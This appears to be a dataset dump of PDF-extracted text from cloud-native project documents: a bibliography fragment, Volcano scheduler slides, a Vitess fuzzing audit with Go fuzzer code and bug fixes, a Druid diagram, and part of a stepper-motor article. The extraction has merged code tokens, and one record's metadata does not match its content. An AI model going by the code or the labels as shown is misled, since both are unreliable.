SOSP , November 2009.\n[26] S. Y . Ko, I. Hoque, B. Cho, and I. Gupta. On availability of\nintermediate data in cloud computations. In HOTOS , May 2009.\n[27] D. Logothetis, C. Olston, B. Reed, K. C. Webb, and K. Yocum.\nStateful bulk processing for incremental analytics. In Proc. ACM\nsymposium on Cloud computing , SoCC ’10, 2010.\n[28] G. Malewicz, M. H. Austern, A. J. Bik, J. C. Dehnert, I. Horn,\nN. Leiser, and G. Czajkowski. Pregel: a system for large-scale\ngraph processing. In SIGMOD , pages 135–146, 2010.\n[29] J. N. Matthews, W. Hu, M. Hapuarachchi, T. Deshane,\nD. Dimatos, G. Hamilton, M. McCabe, and J. Owens.\nQuantifying the performance isolation properties of\nvirtualization systems. In ExpCS ’07 , 2007.\n[30] D. G. Murray, M. Schwarzkopf, C. Smowton, S. Smith,\nA. Madhavapeddy, and S. Hand. Ciel: a universal execution\nengine for distributed data-flow computing. In NSDI , 2011.\n[31] D. Nurmi, R. Wolski, C. Grzegorczyk, G. Obertelli, S. Soman,\nL. Youseff, and D. Zagorodnov. The Eucalyptus open-source\ncloud-computing system. In CCA ’08 , 2008.\n[32] R. Raman, M. Livny, and M. Solomon. Matchmaking: An\nextensible framework for distributed resource management.\nCluster Computing , 2:129–138, April 1999.\n[33] G. Staples. TORQUE resource manager. In Proc.\nSupercomputing ’06 , 2006.\n[34] I. Stoica, H. Zhang, and T. S. E. Ng. A hierarchical fair service\ncurve algorithm for link-sharing, real-time and priority services.\nInSIGCOMM ’97 , pages 249–262, 1997.\n[35] J. Stone. Tachyon ray tracing system.\nhttp://jedi.ks.uiuc.edu/ ˜johns/raytracer .\n[36] C. A. Waldspurger and W. E. Weihl. Lottery scheduling: flexible\nproportional-share resource management. In OSDI , 1994.\n[37] Y . Yu, P. K. Gunda, and M. Isard. Distributed aggregation for\ndata-parallel computing: interfaces and implementations. In\nSOSP ’09 , pages 247–260, 2009.\n[38] M. Zaharia, D. Borthakur, J. Sen Sarma, K. Elmeleegy,\nS. Shenker, and I. Stoica. Delay scheduling: A simple technique\nfor achieving locality and fairness in cluster scheduling. In\nEuroSys 10 , 2010.\n[39] M. Zaharia, M. Chowdhury, M. J. Franklin, S. Shenker, and\nI. Stoica. Spark: cluster computing with working sets. In Proc.\nHotCloud ’10 , 2010.\n[40] M. Zaharia, A. Konwinski, A. D. Joseph, R. Katz, and I. Stoica.\nImproving MapReduce performance in heterogeneous\nenvironments. In Proc. OSDI ’08 , 2008.\n[41] S. Zhou. LSF: Load sharing in large-scale heterogeneous\ndistributed systems. In Workshop on Cluster Computing , 1992.\n[42] Y . Zhou, D. Wilkinson, R. Schreiber, and R. Pan. Large-scale\nparallel collaborative filtering for the Netflix prize. In AAIM ,\npages 337–348. Springer-Verlag, 2008.\n14" } ]
{ "category": "Orchestration & Management", "file_name": "name_blue.pdf", "project_name": "Kubernetes", "subcategory": "Scheduling & Orchestration" }
[ { "data": "kubernetes" } ]
{ "category": "Orchestration & Management", "file_name": "Volcano - A Kubernetes Native Batch System.pdf", "project_name": "Volcano", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Klaus MaVolcano: A Kubernetes Native\nBatch System\n2018 ~ 2020github.com/ volcano -sh/volcano\n@k82cnBI, Data lake, AI Platform, Customized System ……\nSQL\nHive\nSpark \nSQL\n……Streaming\nSpark -\nStreaming\nFlink\n……Batch\nSpark\nFlink Batch\nMR\n……WKflow\nOozie\nArgo\nPipeline\n……\nHDFS, Hbase , NoSQL ……AI\nTesorFlow\nPytorch\nCaffee\n……电商 金融 视频\nService\nDevOps\nMesher\n…………\n 超算\nHPC\nWRF\nMPI\nCromwell\n……资讯\n迁移•业务复杂性 驱动统一资源管理\n随着业务复杂性 的增加,单一的框架、技\n术很难支撑业务的发展\n基于不同技术栈的资源池增加了 资源成本 ,\n管理、运维成本\n不同技术栈增加了 技术成本 ,e.g. YARN\n和K8s经验无法互通\n•云原生 促进统一资源管理落地\n云原生 (CNCF) 提供了 活跃的社区和丰富的\n生态系统 ,支持大数据、 AI等多种负载;\n促使用户向云原生技术迁移\nKubernetes 提供了标准的生态、扩展接\n口,无缝接入 网络、存储、调度 等能力\n各硬件厂商提供对 Kubernetes 的支持,\n例如 GPU,ARM, IB 等\nGPUx86 鲲鹏 昇腾 GPU多领域框架 + 统一资源管理Kubernetes + 多领域框架\n2018 2010 2013•Slurm\n199*•LSF\n•PBS\n•SGE\n2005•Symphony •SGE/UGE\n2005 ~ 2008•Globus •HPC for AI\n2015•Tensorflow\n•Caffe2\n•Pytorch\n2017•kubeflow•Hadoop 1.0\n•HDFS\n2006 2008•Hive\n2012•YARN\n•Impala\n2014•Spark\n•Storm\n•Flink\n2010•Hbase\n•NOSQL\n2013•Tez\n2017•Spark on k8sDecouple framework \n& resource manager\nK8s, \nframework, \ncontainerisc/vhpc\n•Kubeflow\n•kubecon\n1.New framework and ecosystem is possible since Spark\n2.YARN, Mesos , Kubernetes are known as resource manager\n3.HPC application would like to leverage container (ISC/ VHPC )\n4.New bigdata framework, e.g. Spark, start to support kubernetes\n5.Most AI application are built on Kubernetes nativelyWhat’s new?Volcano: A K8S Native Batch System\n•挑战 1: 面向高性能负载的调度策略 , e.g. fair -share, gang -scheduling\n•挑战 2: 支持多种作业生命周期管理 , e.g. multiple pod template, error handling\n•挑战 3: 支持多种异构硬件 , e.g. GPU , FPGA\n•挑战 4: 面向高性能负载的性能优化, e.g. scalability, throughput, network, container \nruntimeKubernetesA CNCF Project\nCRD + Controllers + Scheduler\nkube -apiserverETCDkube -controller -\nmanagerkube -scheduler\nkubelet\nkubectlJobvc-controllers\nQueuevc-scheduler\n12\n3 54\nvsubOverall Architecture\n•相比默认调度器, AI训练\n作业性能提升 31%\n•测试结果为 3 个作业的总\n执行时间 ; 每个作业包含\n2ps + 4workers •相比默认调度器, AI训练\n作业性能提升 30%\n•Gang -scheduling 同时解\n决了多作业死锁的情况\n•相比默认调度器,\nSpark 作业性能提\n升51%\n•测试结果为 104 个\nTP-DCS 查询语句\nusedNode\nusedNode\n……\nAI 大数据 HPC\n……\n派发作业1\n2\n3支持多种类型作业混\n合部署\n支持多队列 用于多租\n户资源共享, 资源规\n划;并分时复用 资源\n支持多种高级调度\n策略 ,有效提升整\n集群资源利用率\n4•支持资源实时监控,\n用于高精度资源调\n度,例如 热点,网\n络带宽\n•容器引擎,网络性\n能优化 , e.g. 免加载\nTensorflow on Volcano (Gang)\nhttp://status.openlabtesting.org/builds?project=theopenlab%2Fvolcano\n•Case 1: 1 job with 2ps + 4workers\n•Case 2: 2 jobs with 2ps + 4workers\n•Case 3: 5 jobs with 2ps + 4workers\n•没有足够的资源同时运行两个作业 ; \n如果没有 gang -scheduling ,其中的\n一个作业会出现 忙等 !\n•当作业数涨到 5后,很大概率出现 死\n锁;一般只能完成 2个作业Tensorflow on Volcano (IOAware)\n•3个作业的执行时间总和 ; 每个作\n业带2ps + 4workers\n•默认调度器执行时间波动较大\n•执行时间的提高量依据数据在作\n业中的比例而定\n•减少 Pod Affinity/Anti -Affinity ,\n提高调度器的整体性能Spark on Volcano\n•Spark -sql-perf (TP-DCS, master)\n•104 queries concurrently\n•(8cpu, 64G, 1600SSD) * 4nodes\n•Kubernetes 1.13\n•Driver: 1cpu,4G; Executor: \n(1cpu,4G)*5•Volcano (min -res): 3.3cpu, 12G\n•Kubernetes : 1node for drivers•如果没有固定的 driver 节点, 最多同时运行 26 条查询语句\n•由于Volcano 提供了作业级的资源预留,总体性能提高了\n~30%MPI on Volcano\nmpirun\nworker_1\nworker_3worker_2\n作业级 ssh免密认证,\n无需更新 keyKubernetes$ kubectl –f mpi_example.yaml\n资源请求少, e.g. \n0.5 CPU\n资源请求较多,还有\n异构资源, e.g. GPU容器网络或主机网\n络,支持 IB/RoCE1.组调度\n2.作业生命周期\n3.资源成本 , e.g. \n竞价GPU Sharing\nAPI server\n用户提交任务\nVolcano\nScheduler\npodVolcano\nDevice PluginNodeKubelet\n1\n2\nScheduled\n3\nSetAllocated算力优化:\n•GPU 硬件加速, TensorCore\n•GPU 共享\n•昇腾改造\n调度算法优化:\n•Job/Task 模型,提供 AI类Job统一批\n量调度\n•多任务排队,支持多租户 /部门共享集\n群\n•单Job内多任务集群中最优化亲和性调\n度、Gang Scheduling 等\n•主流的 PS-Worker 、Ring AllReduce\n等分布式训练模型\n流程优化\n•容器镜像\n•CICD 流程\n•日志监控一万节点,百万容器; 2000 Pods/s\n①编排:\n•Etcd 分库分表 ,e.g. Event 放到单独库,\nwal/snapshot 单独挂盘\n•通过一致性 哈希分散处理,实现 controller -\nmanager 多活\n•Kube -apiserver 基于工作负载的弹性扩容\n②调度:\n•通过 EquivalenceCache ,算法剪枝 等技术\n提升单调度器的吞吐性能\n•通过共享资源视图实现 调度器多活 ,提升调度\n速率\n③网络:\n•通过trunkport 提升 单节点容器密度及单集群\nENI容量\n•通过 Warm Pool 预申请网口,提升网口发放\n速度\n•基于eBPF /XDP 支持 大规模、高度变化的云\n原生应用 网络, e.g. Service, network policy \n④引擎:\n•containerd 并发 启动优化\n•支持shimv2 ,提升单节点容器密度\n•镜像下载加速 Lazy loading\n基础服务\nECS/VPC/OBS/…\nSWR 镜像仓库\n(cache mirror)\n集群管控面\nMulti -Schedulers\nKube APIServers\nVolcanoControllers\n 1\netcd1 集群\n …\nPods\netcd2 集群\nNodes Other OBJ\nNodes Controllers\nPods Controllers\n默认Scheduler\nKind Controllers\n…\n3\n2\n1W节点集群\n已有节点 扩容节点P2P\nAgent….\n云网络Pod\n扩容节点P2P\nAgentPodP2P\nAgentPod\n4Cromwell with Volcano\nhttps://cromwell.readthedocs.io/en/stable/backends/Volcano /WDL\nKubernetesJob\nJob\nJob……..1.Cromwell 社区原生支持 Volcano\n2. 企业版已经上线 华为云 GCS\n3. 通过 cromwell 支持作业依赖\n4.Volcano 提供面向作业、数据依赖的调度Volcano CLI\n•vsub\n提交作业\n•vcancel\n取消作业\n•vsuspend\n挂起作业\n•vresume\n重启作业\n•vjobs\n查询作业状态及列表\n•vqueues\n查询队列状态及列表\n•vadmin\n管理员命令行, e.g. 创建队列常用命令行:\n官方支持 :\n•Go\n•Python\n•Java\n•CSharp\n•Javascript\n•Haskell\n社区支持:\n•Node.js\n•Rust\n•Scala\n•……开发库 (SDK) :KubeSim\nhttps:// github.com/volcano -sh/kubesim\n简介:\n•集群进行性能测试及调度的描述工具\n•不受资源限制,模拟大规模 K8S集群\n•完整的 K8S API 调用,不会真正创建 pod\n•已经支持产品侧大规模专项及调度专项的模拟工作\n总体结构 :\n•Worker cluster :承载 kubemark 虚拟节点,\nhollow pod\n•Master cluster :管理 kubemark 虚拟节点,\nhollow node\n•Hollow pod = hollow kubelet + hollow proxyAdopters & Contributors\nhttps:// github.com/volcano -sh/volcano/blob/master/docs/community/adopters.md\nCommunity\n•CNCF Sandbox: https:// landscape.cncf.io/selected=volcano\n•1360+ GitHub Stars\n•~100 Contributors from Huawei, AWS , JD.com, OpenAI , Baidu , Tencent , etc.\n•12 formal releases\n•5 maintainers across 3 independent companies (Huawei: 3, IBM: 1, Tencent 1)\n•14 public adopters (private not included)\n•CII best practice: passing\n•License: Apache 2 License\nReleases\nVolcano: A Kubernetes Native Batch System\nv1.0:\n•GPU Sharing\n•Preempt and reclaim \nupgrade to Beta\n•Job dynamic scale up \nand down\n•Integrate with flink\noperator\n•DAG job based on Argov0.1:\n•IndexedJob\n•Multiple Pod template\n•Error handling of \nPod/Job\n•Queue/Job command \nline\n•Delay Pod Creation\n•Job pluginsv0.2:\n•Job Priority\n•Queue Capacity\n•Fair-share of NS cross \nQueue\n•Binpack algorithm\n•Multiple event in job \nlifecycle policyv0.3:\n•Add maxRetry in job \ncontroller\n•Bug fix of scheduler, e.g. \nResource, callback\n•Dynamic load scheduler \nconfiguration\n•Support network policy\n•Command line \nenhancementsv0.4:\n•Upgrade to go \nmode\n•sign certificate by \nopenssl\n•Remove \ndeprecated API \nversions\n•Bug fix\n2019.5 2019.9 2020.1 2020.4 2020.7Thanks!\nFurther reading:\n●https://groups.google.com/forum/#!forum/volcano -sh\n●https://slack.cncf.io /#volcano\n●https//github.com/volcano -sh/volcano\nJoin our community and give us feedback!Performance Index\n名字 英文缩写 描述 计算公式 衡量标准 备注\n往返速率 Roundtrip测试为完成作业,在平台上消\n耗的时间作业完成时间 –作业提交时\n间越少越好作业为空,例如 busybox ;并以客\n户端 收到反馈的时间为准\n吞吐率 Throughput测试系统单位时间内可以接收\n的任务单位时间内接收的任务 越多越好需要保证系统长期稳定的情况下进\n行测试\n作业平均执行\n时间AET测试作业在系统中的平均执行\n时间AVG( 作业完成时间 –作业开\n始执行时间 )越少越好测试时需要指定测试场景,例如\nTerasort , HPL 等\n作业平均等待\n时间AWT测试作业在系统中的平均等待\n时间AVG( 作业提交时间 –作业开\n始执行时间 )越短越好 根据队列权重进行调整\n资源使用率 Utilization测试集群中资源的实际使用情\n况实际使用资源 /集群总资源 越接近 1越好\n资源分配率 Allocation 测试集群中资源的分配情况 分配资源 /集群总资源 越接近 1越好\n用户资源分配\n率U-Allocation 测试各个用户的资源分配情况 DIV( 用户分配到的资源 )用户之间越接近越\n好包括单个调度周期和某一时间段的\n资源分配情况,根据权重调整\n资源成本 Cost完成指定作业集所需要的总成\n本SUM( 作业执行时间 * 资源成\n本)越少越好 资源成本会有不同,比如 竞价实例\n用户资源成本 U-Cost每个用户完成指定作业所需要\n的成本DIV( 每个用户的作业执行时\n间* 资源成本 )•越少越好\n•用户之间越接近\n越好根据用户权重调整Da (Klaus) Ma\n●Tech Lead of Huawei Container Infra\n●Founder of Volcano/ kube -batch\n●Tech Lead of CNCF SIG-Runtime\n●Tech Lead of CNCF Research User Group\n●Emeritus Leads of Kubernetes Machine \nLearning Working Group\n●Emeritus Leads of Kubernetes SIG Scheduling\n●Kubernetes Maintainer\n●Technical Program Committee of \nISC/VHPC'20/21\n@k82cn\n" } ]
{ "category": "App Definition and Development", "file_name": "VIT-02-report-fuzzing-audit.pdf", "project_name": "Vitess", "subcategory": "Database" }
[ { "data": "P R E S E N T S \nFuzzing integration for Vitess\nIn collaboration with the Vitess maintainers and The\nLinux Foundation\nA u t h o r s\nAdam Korczynski\n<\nadam@adalogics.com\n>\nDavid Korczynski\n<\ndavid@adalogics.com\n>\nDate: 14th May, 2021\nThis report is licensed under Creative Commons 4.0\n(CC BY 4.0)\n1\nE x e c u t i v e s u m m a r y\nThis report details an engagement by Ada Logics focused\non improving the fuzzing\ninfrastructure of Vitess. In this engagement we built\nupon earlier fuzzing of Vitess efforts\ndone by Ada Logics by developing more fuzzers that\ntarget critical parts of Vitess. The\nproject was stretched between March and April 2021,\nand the reason an Ada Logics fuzzing\naudits stretches over a longer period of time in comparison\nto regular security audits is the\nneed for having the fuzzers run for an extended time\nas well as iteratively developing the\nfuzzers based on their initial results.\nVitess has a large user base of Vitess which includes\nSlack and Youtube. This makes\nsecurity highly relevant for Vitess and thus improving\non the Vitess continuous fuzzing efforts\nmust be considered a priority.\nAda Logics developed a total of 10 fuzzers that together\ntarget a significant part of the Vitess\ncodebase. The engagement resulted in finding 5 bugs\nand none of these bugs have direct\nsecurity implications. This is a testament to the\nsecurity and robustness of Vitess. The\nfuzzers all continuously run following this engagement\nby way of OSS-Fuzz, which is a free\nservice by Google that supports running fuzzers for\ncritical open source projects.\nResults summarised\n10 fuzzers developed for both critical endpoints and\ncritical internals.\nAll fuzzers and fixes pushed to upstream Vitess repository.\nAll fuzzers running continuously through OSS-fuzz.\n5 bugs found:\n3 Fixes deployed, 2 still pending.\n2E n g a g e m e n t p r o c e s s a n d m e t h o d o l o g y\nThe approach to this engagement was to work openly\nby way of the Vitess Github repository\nand contribute to the open source project as a regular\nopen source contributor. In addition to\ncommunicating by way of pull requests and reviews,\ncommunication was also done by way\nof a private messaging application and we also had\nseveral video conference calls\nthroughout the process. All of the work was done against\nthe latest master branch on the\nVitess public repository (\nhttps://github.com/vitessio/vitess\n)\nand the scope was specified to be\nthe source code in\nhttps://github.com/vitessio/vitess/tree/master/go\n.\nThe focus of the\nengagement was to look at endpoints of the MySQL and\nthe grpc protocols. All fuzzers were\nimplemented by way of\ngo-fuzz\n.\n3O v e r v i e w o f f u z z e r s\nIn this section we will go through the fuzzers developed\nfor Vitess and in total 10 fuzzers\nwere contributed to Vitess. The following table gives\nan overview of the fuzzers:\nFuzzer function name\nPath\nPackage\nFuzzIsDML\ngo/vt/test/fuzzing\nsqlparser\nFuzzNormalizer\ngo/vt/test/fuzzing\nsqlparser\nFuzzTLSServer\ngo/mysql\nmysql\nFuzzHandleNextCommand\ngo/mysql\nmysql\nFuzzReadQueryResults\ngo/mysql\nmysql\nFuzz\ngo/vt/vtgate/grpcvtgateconn\ngrpcvtgateconn\nFuzzEngine\ngo/vt/vtgate/engine\nengine\nFuzz\ngo/vt/vttablet/tabletserver/vstreamer\nvstreamer\nFuzz\ngo/vt/test/fuzzing\nvtctl\nFuzzAnalyse\ngo/vt/vtgate/planbuilder\nplanbuilder\nWe now give a short description of what each of these\nfuzzers do and, in particular, how they\nuse the fuzz payload to target Vitess.\nFuzzIsDML\nTargetssqlparser.IsDML\nwith SQL queries created from\nthe fuzzing payload.\nFuzzNormalizer\nTargetssqlparser.Normalize\nwith SQL statements created\nfrom the fuzzing payload.\nFuzzTLSServer\nSets up anAuthServerStatic\nserver and establishes\na connection to it. It then attempts to\nfind crashes by sending packets to the connection\nand the contents of these packets are\ncreated by way of the fuzzing payload.\nFuzzHandleNextCommand\nTestshandleNextCommand\nwith a single packet created\nfrom the fuzzing payload.\nFuzzReadQueryResults \nTests theComQuery\npacket wrapper with an SQL query\ncreated by the fuzzing payload.\n4grpcvtgateconn.Fuzz\nCreates a fake vtgate service, connects to it and\nexecutes SQL queries against the\nconnection. The contents of the SQL queries are created\nfrom the fuzzing payload.\nFuzzEngine\nTargetsvtgate/engine\nby executing queries created\nby way of the fuzzing payload.\nvstreamer.Fuzz\nTests the VStream by building a plan with a filter\nthat has a rule created with the fuzzing\npayload.\nvtctl.Fuzz\nA high-level fuzzer that tests the robustness of thevtctl\n.\nFuzzAnalyse \nCreates a query graph with aSELECT\nstatement created\nfrom the fuzzing payload.\nFuzzTLSServer in-depth\nDue to space limitations we will not go in details\nwith all of the different fuzzers. However, to\nget insight into how they are implemented, we will\ngo into details with one of them, namely\nthe mysql.FuzzTLSServer. From a high level this fuzzer\nsets up a server, establishes a\nconnection to it and sends packets that are created\nfrom the fuzzing payload to the server.\nThe fuzzer first sets up an AuthServerStatic and create\na listener on it:\nfuncFuzzTLSServer(data []byte)int{th := &fuzzTestHandler{}\nauthServer := NewAuthServerStatic(\"\",\"\",0)authServer.entries[\"user1\"] = []*AuthServerStaticEntry{{Password:\"password1\",}}deferauthServer.close()l, err := NewListener(\"tcp\",\":0\", authServer, th,0,0,false)iferr !=nil{return-1}deferl.Close()\nThe fuzzer then proceeds with getting the host, port\nand root. The host and the port are\nneeded to establish a connection to the server, and\nthe root is needed to set up the SSL\ncertificate.\nhost, err := os.Hostname()iferr !=nil{return-1\n5}port := l.Addr().(*net.TCPAddr).Portroot, err := ioutil.TempDir(\"\",\"TestTLSServer\")iferr !=nil{return-1}\nNext, the creates a signed certificate:\ntlstest.CreateCA(root)tlstest.CreateSignedCert(root, tlstest.CA,\"01\",\"server\", host)tlstest.CreateSignedCert(root, tlstest.CA,\"02\",\"client\",\"Client Cert\")\nserverConfig, err := vttls.ServerConfig(path.Join(root,\"server-cert.pem\"),path.Join(root,\"server-key.pem\"),path.Join(root,\"ca-cert.pem\"),\"\")iferr !=nil{return-1}l.TLSConfig.Store(serverConfig)\nAnd the fuzzer then allows the listener to accept\nincoming connections:\ngol.Accept()\nFinally, the fuzzer connects to the server:\nconnCountByTLSVer.ResetAll()// Setup the right parameters.params := &ConnParams{Host: host,Port: port,Uname:\"user1\",Pass:\"password1\",// SSL flags.Flags: CapabilityClientSSL,SslCa: path.Join(root,\"ca-cert.pem\"),SslCert: path.Join(root,\"client-cert.pem\"),SslKey: path.Join(root,\"client-key.pem\"),}conn, err := Connect(context.Background(), params)iferr !=nil{return-1}\nThe fuzer has now completed initialization and has\na working connection to a server. It is\nnow time to send the packets and to do this the fuzzer\nuses a small helper function that\nconverts the fuzzing payload to a packet and sends\nit. This helper function is defined as\nfollows:\n6func(c *Conn)writeFuzzedPacket(packet []byte) {c.sequence =0data, pos := c.startEphemeralPacketWithHeader(len(packet)+1)copy(data[pos:], packet)_ = c.writeEphemeralPacket()}\nand it is invoked by the fuzzer as follows, wherequery\nis the payload from the fuzzer:\nconn.writeFuzzedPacket(query)\nAt this point all the necessary components for the\nfuzzer have been completed: A server is\ncreated and a connection is established to it and,\nfinally, packets defined by way of the\nfuzzing payload are being sent to the connection.\nHowever, because the server initialization is expensive\nin terms of performance, the fuzzer is\nat this point executing approximately 1 iteration\nper second. To improve the execution speed\nwe came up with a solution to send 20 packets per\nfuzz iteration instead of just 1. To achieve\nthis, we create an array of byte arrays in the beginning\nof the fuzzer:\ntotalQueries :=20varqueries [][]bytec := gofuzzheaders.NewConsumer(data)fori :=0; i < totalQueries; i++ {query, err := c.GetBytes()iferr !=nil{return-1}iflen(query) <40{continue}queries =append(queries, query)}\nIferr\ninquery, err := c.GetBytes()\nshould not be\nnil, we abandon the fuzz iteration\nand start over. This ensures that we only proceed\nwith the expensive server setup ifqueries\nhave a length of 20. At the end of the fuzzer, instead\nof sending a single packet as we did\nabove, we send all 20 packets fromqueries\n:\nfori :=0; i <len(queries); i++ {conn.writeFuzzedPacket(queries[i])}\nThe finished mysql.FuzzTLSServer can be found\nhere\n.\nI s s u e s f o u n d\nThe table below gives an overview of the issues found\nby the fuzzers. Bug 0, 1 and 2 were\ntriggered by untrusted input, however they are all\nrecoverable. When encountering these in a\nproduction environment, they will not hurt a particular\nprocess but rather show up as an\n7error. Bug 4 and 5 were found by fuzzing endpoints with trusted input. As such, none of the\nfound bugs represent a security risk for Vitess.\nID\nPublic\nOSS-fuzz report\nFix\nType of Issue\n0\nYes\nhttps://bugs.chromi\num.org/p/oss-fuzz/i\nssues/detail?id=323\n69\nhttps://github.com/vitess\nio/vitess/pull/7925\nslice bounds out of\nrange insqlparser\n1\nNo\nhttps://bugs.chromi \num.org/p/oss-fuzz/i \nssues/detail?id=324 \n45\nhttps://github.com/vitess \nio/vitess/pull/8033\nindex out of range insqltypes\n2\nNo\nhttps://bugs.chromi \num.org/p/oss-fuzz/i \nssues/detail?id=317 \n71\nPending\nindex out of range invtctl\n3\nNo\nhttps://oss-fuzz.com \n/testcase-detail/487 \n7295513894912\nPending\nruntime error invt/topo/shard\n4\nYes\nhttps://bugs.chromi \num.org/p/oss-fuzz/i \nssues/detail?id=323 \n76#c4\nhttps://github.com/vitess \nio/vitess/pull/8106\nIndex out of range inmysql.(*Conn).handleNextCommand\nAt the time of project termination, 3 of the 5 bugs\nhave been fixed. We will now go into\ndetails with the issue and fix for issue 0,1 and 4.\nIssue 0: Slice bounds of range in sqlparser\nThis bug happens when a “@” in a query would be superseded\nby EOF. The fix was to check\nif a particular token is equal to EOF:\ngo/vt/sqlparser/token.go:\niftkn.cur() =='`'{tkn.skip(1)tID, tBytes = tkn.scanLiteralIdentifier()}elseiftkn.cur() == eofChar {returnLEX_ERROR,\"\"}else{tID, tBytes = tkn.scanIdentifier(true)}\n8Issue 1. index out of range in sqltypes\nThis bug is triggered due to improper encoding of\nthe character “§” in SQL queries. The\nissue was debugged in depth\nhere\n. It was fixed with:\ngo/sqltypes/value.go\nfuncBufEncodeStringSQL(buf *strings.Builder, valstring) {buf.WriteByte('\\'')for_, ch :=rangeval {ifch >255{buf.WriteRune(ch)continue}ifencodedChar := SQLEncodeMap[ch]; encodedChar== DontEscape {buf.WriteByte(byte(ch))buf.WriteRune(ch)}else{\n4. Index out of range inmysql.(*Conn).handleNextCommand\nThe panic occurs when a packet of length 0 is successfully\npassed tomysql.(c *Conn)handleNextCommand\n. A fix was introduced to check for\n0-length cases:\ngo/mysql/conn.go\n}returnfalse}iflen(data) ==0{returnfalse}switchdata[0] {caseComQuit:\nA d v i c e f o l l o w i n g e n g a g e m e n t\nThe engagement did produce a number of great results\nbut this is not the end. In this section\nwe go through ideas for future work that can improve\nthe fuzzing infrastructure of Vitess\neven further. In short, we present three areas of\nfuture work:\n1.\nFuzz against a complete cluster.\n2.\nIntegrating in structure-aware fuzzing.\n3.\nConnect the VTGate handler with the endpoints.\n4.\nIntegrate Vitess fuzzing into CIFuzz.\nFuzz against a complete cluster\nWe briefly investigated the possibilities of running\na full cluster during each fuzz iteration, but\nthis was deemed unachievable within the scope of the\nengagement. However, we suspect\nthis to be an interesting avenue for further research\nas it will stress test a complete Vitess\n9setup in comparison to more targeted fuzzers. A good place to start with this is\nT e s t M a i n\nfrom\nthe VSchema endtoend test\n.\nIntegrate structure-aware fuzzing\nVitess accepts untrusted sql queries as input and\nan interesting avenue for further work is\ncreating a grammar-aware SQL fuzzer. This could benefit\nseveral of the existing fuzzers and\nallow them to generate valid SQL queries for each\nfuzz iteration. This type of fuzzer is\nobserved in other\ndatabase projects\nas well as in\nChromium\n.\nConnect the VTGate handler with the endpoints\nThe preference of the Vitess maintainers in this engagement\nwas to focus on endpoints.\nHowever, when investigating the reach of the endpoints\nin the currently Vitess build on\nOSS-Fuzz, we observe that the endpoints do not reach\nall internal parts of Vitess. The\nreason for this is that the\nvtgateHandler\nis not properly\nutilized and a testhandler is used\ninstead. Improving on this by allowing the endpoint\nfuzzers to reach VTGate is a potential\narea of significant improvement to the fuzzing suite.\nIt is noteworthy that to mitigate this Ada\nLogics wrote fuzzers targeted VTGate, although it\nwould be preferred to have the fuzzers\nreach VTGate without through the endpoints.\nIntegrate Vitess fuzzing into CIFuzz\nCIFuzz is a service that enables execution of fuzzer\nas part of a continuous integration\nsystem. This can assist in catching bugs early in\nthe development process and it can easily\nbe integrated into projects already part of OSS-Fuzz.\nFor further information on this we refer\nto\nCIFuzz\n.\nC o n c l u s i o n s\nIn this engagement researchers from Ada Logics carried\nout an extensive fuzzing audit of\nVitess stretched over March and April 2021. A total\nof ten fuzzers were developed and these\nfuzzers were developed iteratively based on results\nduring the engagement. During the\nengagement the fuzzers found five bugs although none\nof these are security critical. The\nfuzzer infrastructure has been integrated into OSS-Fuzz\nwhich allows the fuzzers to run\ncontinuously following the ending of the engagement.\nOur efforts show that Vitess benefits from fuzzing\nand that the fuzzers are capable of finding\nbugs. However, none of the bugs found in the engagement\nare critical, and we, therefore,\nconclude that the security of Vitess is of very high\nstandard.\nWe thank the Linux Foundation for sponsoring this\nwork as well as the Vitess maintainers for\nthe collaboration.\n10" } ]
{ "category": "App Definition and Development", "file_name": "cluster.pdf", "project_name": "Druid", "subcategory": "Database" }
[ { "data": "Real-time \nNodes\nCoordinator \nNodesBroker Nodes\nHistorical \nNodesMySQL\nZookeeper\nDeep \nStorage\nStreaming \nData\nBatch\nDataClient \nQueries\nQueries\nMetadata\nData/SegmentsDruid Nodes\nExternal Dependencies" } ]
{ "category": "App Definition and Development", "file_name": "stepper-motor.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "(http://www.designcon.com/santaclara/?_mc=AD_DC16_BCS_RBN)\n(http://www.embedded.com)CONTACT US (/CONTACTUS) • SUBSCRIBE TO NEWSLETTERSSUBSCRIBE TO NEWSLETTERS loginregisterDEVELOPMENTESSENTIALS & EDUCATIONCOMMUNITYARCHIVESABOUT USSearch\n>>>>Home (/)MCUs, Processors & SoCs Development Centers (/development/mcus-processors-and-socs)Design How-To (/development/mcus-processors-and-socs/articles)\n4Tweet\n (mailto:?subject=Generate stepper-motor speed profiles in realtime&body=http://www.embedded.com/design/mcus-processors-and-socs/4006438/Generate-stepper-motor-speed-profiles-in-real-time)Generate stepper-motor speedprofiles in real timeDavid AustinDavid AustinDECEMBER 30, 2004\nA new algorithm for stepper-motor acceleration allows speed profiles toA new algorithm for stepper-motor acceleration allows speed profiles tobe parameterized and calculated in real time. This algorithm can run on abe parameterized and calculated in real time. This algorithm can run on alow-end microcontroller using only simple fixed-point arithmeticlow-end microcontroller using only simple fixed-point arithmeticoperations and no data tables. It develops an accurate approximation foroperations and no data tables. It develops an accurate approximation forthe timing of a linear ramp with constant acceleration and deceleration.the timing of a linear ramp with constant acceleration and deceleration.It's commonly thought that the timing of a linear speed ramp for a stepper motor istoo complex to be calculated in real time. The exact formula for the step delay is inEquation 8. The solution has been to store the ramp data in precompiled arrays, butthis method is inflexible and wastes memory. The alternative has been to use amore powerful and expensive processor than otherwise needed or a high-levelstepper-control IC. This article develops an accurate approximation that has beenimplemented in C using 24.8 fixed-point arithmetic on a mid-range PICmicrocontroller.Motor step signals can be generated by a 16-bit timer-comparator module ascommonly integrated in microcontrollers. On the PIC, the CCP(capture/compare/pwm) performs this function. It allows steps to be timed to theresolution of one timer period. Each step advances the motor by a constantincrement, typically 1.8 degrees on a hybrid stepper motor.Share\n25LikeLike\nSPONSOR VIDEO, MOUSEOVER FOR SOUNDSPONSOR VIDEO, MOUSEOVER FOR SOUNDMOST READ06.26.2007Building Bare-Metal ARM Systemswith GNU: Part 1 - Getting Started(/design/mcus-processors-and-socs/4007119/Building-Bare-Metal-ARM-Systems-with-GNU-Part-1--Getting-Started)12.30.2004\nThe timer frequency should be as high as possible while still allowing long delays asthe motor is accelerated from stop. A timer frequency of 1MHz has been used. Amaximum motor speed of 300rpm is then equivalent to a delay count of 1,000. It'snecessary to have high timer resolution to give smooth acceleration at high speed.Notation and basic formulasNotation and basic formulasDelay (sec) programmed by timer count c:\n Equation 1f = timer frequency (Hz).Motor speed ω (rad/sec) at fixed timer count c:\n Equation 2α = motor step angle (radian).1rad = 